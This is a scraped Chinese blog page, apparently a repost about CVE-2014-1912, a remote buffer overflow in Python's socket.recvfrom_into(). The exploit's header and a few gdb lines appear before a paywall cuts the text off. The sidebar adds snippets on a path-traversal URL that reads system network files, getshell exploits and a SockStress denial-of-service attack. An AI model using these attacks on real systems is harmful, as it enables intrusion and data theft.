python open 函数漏洞_Python socket.recvfrom_info()函数中的远程代码执行漏洞

最新推荐文章于 2023-10-25 15:06:25 发布
最新推荐文章于 2023-10-25 15:06:25 发布
阅读量214 收藏
点赞数
文章标签: python open 函数漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29497981/article/details/113962878
版权

最近,pastebin上发布了一个exploit,是关于Python 2.7和3.x版本中的socket.recvfrom_into()函数中一个远程代码执行漏洞(栈溢出)的PoC。

(有些地方pastebin.com可能被墙了,为了方便,译者把它拷贝到文章里。)原exploit如下:#!/usr/bin/env python'''

# Exploit Title: python socket.recvfrom_into() remote buffer overflow

# Date: 21/02/2014

# Exploit Author: @sha0coder

# Vendor Homepage: python.org

# Version: python2.7 and python3

# Tested on: linux 32bit + python2.7

# CVE : CVE-2014-1912

socket.recvfrom_into() remote buffer overflow Proof of concept

by @sha0coder

With NX evasion!

(gdb) x/i $eip

=> 0x817bb28:mov    eax,DWORD PTR [ebx+0x4]        eax full conrol

0x817bb2b:test   BYTE PTR [eax+0x55],0x40

0x817bb2f:jne    0x817bb38 -->

...

0x817bb38:mov    eax,DWORD PTR [eax+0xa4]      

0x817bb3e:tes

最低0.47元/天 解锁文章
张恒平
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python open 函数漏洞_python和django的目录遍历漏洞
weixin_28878311的博客
02-09 165
(20210205学习笔记)攻击者通过请求http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1或类似URL,可跨目录读取系统敏感文件。显然,这个漏洞是因为WebServer处理URL不当引入的。我们感兴趣的是,这到底是不是一个通用WebServer的漏洞。经分析验证,我们...
linux_raw_socket.tar.gz
10-31
Linux Raw Socket,是一种在Linux操作系统用于网络编程的特殊类型的套接字,它允许程序员访问网络协议栈的底层,而不必使用操作系统提供的高级接口。在使用标准的TCP或UDP套接字时,操作系统会处理大部分网络协议...
python recvfrom函数详解_CVE-2014-1912 Pythonsocket.recvfrom_into’函数缓冲区溢出漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资...
weixin_39819661的博客
11-28 436
#!/usr/bin/env python'''# Exploit Title: python socket.recvfrom_into() remote buffer overflow# Date: 21/02/2014# Exploit Author: @sha0coder# Vendor Homepage: python.org# Version: python2.7 and python3...
python open 函数漏洞_input()函数Python漏洞
weixin_28943045的博客
03-01 208
在本文,我们将学习在版本2.x输入函数如何以不良方式运行。或更早。在2.x版。raw_input()函数可替换该input()函数。在较新的版本3.x。或稍后,将两个功能的所有所需特征和功能合并到该input()方法。首先,让我们看一下在Python 2.x接受输入的内置函数的输入类型。示例#InputGiven:Stringstr1=raw_input("Outputo...
python open 函数漏洞_关于python和django的目录遍历漏洞(任意文件读取)
weixin_39795971的博客
12-09 366
感谢lijiejie(李姐姐)投递近来我和同事观察到wooyun平台上较多地出现了刷“任意文件读取漏洞”。类似:攻击者通过请求http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1或类似URL,可跨目录读取系统敏感文件。通过history读其他配置文件 或者直接读常规配置文...
python open 函数漏洞_CVE-2006-4980 Python repr()函数远程指令执行漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...
weixin_39900676的博客
12-09 61
|参考资料来源:SECUNIA名称:22303链接:http://secunia.com/advisories/22303来源:SECUNIA名称:22276链接:http://secunia.com/advisories/22276来源:launchpad.net链接:https://launchpad.net/distros/ubuntu/+source/python2.4/+bug/5663...
socket+python_python_socket
09-21
Pythonsocket库是进行网络通信的基本工具,它允许程序员创建客户端和服务器端应用程序,实现不同设备间的网络数据传输。在“socket+python_python_socket”这个主题,我们主要探讨的是如何利用Pythonsocket...
UDP_net_socket.rar_UDP 类_画图 udp
09-21
"接收端接收参数画图程序"部分,接收端需要监听特定的端口,使用`recvfrom()`函数接收数据。一旦数据到达,接收端可以解析这些参数,根据指令在画布上绘制图形。需要注意的是,因为UDP的无连接特性,接收端并不知道...
linux_udp_socket.tar.gz
10-31
创建UDP套接字的函数是`socket()`,使用`bind()`来绑定一个本地端口号,`recvfrom()`用于接收数据,`sendto()`则用于发送数据。这些函数是C语言标准库的一部分,可以在任何支持Unix-like系统的程序使用。 例如,...
tcp.rar_UDP recvfrom_tcp_tcp sendto_udp 函数_udp_sendto
09-24
本篇文章将详细探讨TCP和UDP的区别,以及如何使用C语言的`recvfrom`、`tcp_sendto`等函数进行网络编程。 首先,TCP是一种面向连接的协议,它提供了可靠的、全双工的数据传输服务。TCP通过建立连接、确认应答、重...
python open 函数漏洞_Python系列之——编写已知漏洞exp实现批量getshell
weixin_39542093的博客
12-09 342
作者:奶权前面一篇Python系列之——zzcms漏洞挖掘到exp编写相信大家应该都读过了大家应该都觉得用程序实现自动化漏洞利用很爽吧今天就来教一下大家怎么通过已知的漏洞编写exp0x01 漏洞分析以通达OA前台getshell为例(漏洞来自90sec论坛)论坛给出的exp讲人话就是 post一个文件、'type=addfile'和'other=}/../../../../{22'到'pda/ap...
Python之路之socket陷阱
帅醉了的博客
02-11 705
写一段小脚本,运行却发现各错误 import socket socket.setdefaulttimeout(2) s = socket.socket() s.connect(("192.168.176.141",21)) ans = s.recv(1024) print ans Traceback (most recent call last): File “1.py”, line 5, i...
Linux kernel ‘__skb_recv_datagram’函数输入验证漏洞
weixin_30814319的博客
02-21 120
漏洞名称: Linux kernel ‘__skb_recv_datagram’函数输入验证漏洞 CNNVD编号: CNNVD-201302-314 发布时间: 2013-02-21 更新时间: 2013-02-21 危害等级: 漏洞类型: 输入验证 威胁类型: 本地 ...
linux内核 recvfrom,Linux Kernel 'recvmsg()'及'recvfrom()'函数本地信息泄露漏洞
weixin_28692153的博客
04-29 143
发布日期:2013-11-21更新日期:2014-01-08受影响系统:Linux kernel 3.4.xLinux kernel 3.2.xLinux kernel 3.12.xLinux kernel 3.10.x描述:--------------------------------------------------------------------------------BUGTRAQ...
(十四)WebSockets安全漏洞
weixin_43047908的博客
04-18 1330
文章目录什么是WebSocket?WebSockets漏洞发现处理WebSocket消息以利用漏洞操纵WebSocket握手连接以利用漏洞使用跨站点WebSocket利用漏洞如何保护WebSocket连接 什么是WebSocket? WebSockets是通过HTTP发起的双向全双工通信协议。它们通常用于现代Web应用程序以流式传输数据和其他异步流量。 Web浏览器和网站之间的大多数通信都使用HTTP。使用HTTP,客户端发送请求,服务器返回响应。通常,响应立即发生,并且事务完成。即使网络连接保持打开状态
libcurl Socks5 堆缓冲区溢出漏洞(CVE-2023-38545)详细分析
最新发布
murphysec的博客
10-25 707
curl 是用于在各种网络协议之间传输数据的命令行工具,libcurl 用于提供处理网络通信和数据传输的 Api 接口。curl 默认下载缓冲区为 102400 字节,但如果设置低于每秒 102400 字节,缓冲区大小会自动设置为更小的值。libcurl 下载缓冲区默认为 16KB,应用程序可通过 CURLOPT_BUFFERSIZE 选项设置其大小。
【burpsuite安全练兵场-客户端16】测试WebSockets安全漏洞-3个实验(全)
热门推荐
01-17 1万+
【BP靶场portswigger-客户端16测试WebSockets安全漏洞】3个实验-万文详细步骤
Python 实现SockStress全连接攻击
CSDN
10-06 1万+
Sock Stress 全连接攻击属于TCP全连接攻击,因为需要建立一次完整的TCP三次握手,该攻击的关键点就在于,攻击主机将windows窗口缓冲设置为0,实现的拒绝服务。攻击者向目标发送一个很小的流量,但是会造成产生的攻击流量是一个巨大的,该攻击消耗的是目标系统的CPU/内存资源,使用低配版的电脑,依然可以让庞大的服务器拒绝服务,也称之为放大攻击。
import socket import numpy as np import scipy.signal as signal from scipy.fftpack import fft,ifft from scipy.stats import pearsonr import matplotlib.pyplot as pltdef is_valid(corr_arr): for i in range(0, 25): if corr_arr[i] < 0.8: return False return True if __name__ == '__main__':udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # 2.绑定本地的相关信息,如果一个网络程序不绑定,则系统会随机分配 dest_addr = ('192.168.4.2', 4444) # ip地址 和端口号,ip一般不用写,表示本机的任何一个ip udp_socket.bind(dest_addr) # 必须绑定自己的IP N = 32768 # 采样点数 fs = 48000 # 采样频率 n = np.arange(N) # 用于产生离散时间序列 f = n * fs / N # 生成频率序列,为后续作图做准备#将标准的chirp数据取出来作为标准 file_object = open('chirp2218.txt') try: chirp_data_str = file_object.read() chirp_data_spl = chirp_data_str.split(',') n = len(chirp_data_spl) chirp_data = np.zeros(4800, dtype=np.int16) for i in range(0, 4800): chirp_data[i] = int(chirp_data_spl[i]) finally: file_object.close() while True: recv_data = udp_socket.recvfrom(19200) n = len(recv_data[0])voice_data = recv_data[0]voice_data_del = np.zeros(9600, dtype=np.int16)
06-07
这段代码主要是一个Python程序,首先导入了一些Python的库,包括socket、numpy、scipy.signal、scipy.fftpack、scipy.stats和matplotlib.pyplot。这些库提供了一些常用的函数和工具,例如用于网络通信的socket库、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值